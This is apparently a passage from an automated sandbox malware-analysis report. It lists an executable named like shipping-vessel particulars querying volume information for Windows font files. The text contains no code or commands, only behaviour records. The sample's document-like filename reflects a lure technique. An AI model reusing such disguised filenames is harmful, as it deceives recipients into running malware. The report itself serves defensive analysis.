          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\comic.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\comici.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\consola.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\constan.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\constani.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\cour.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\couri.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\framd.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\impact.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
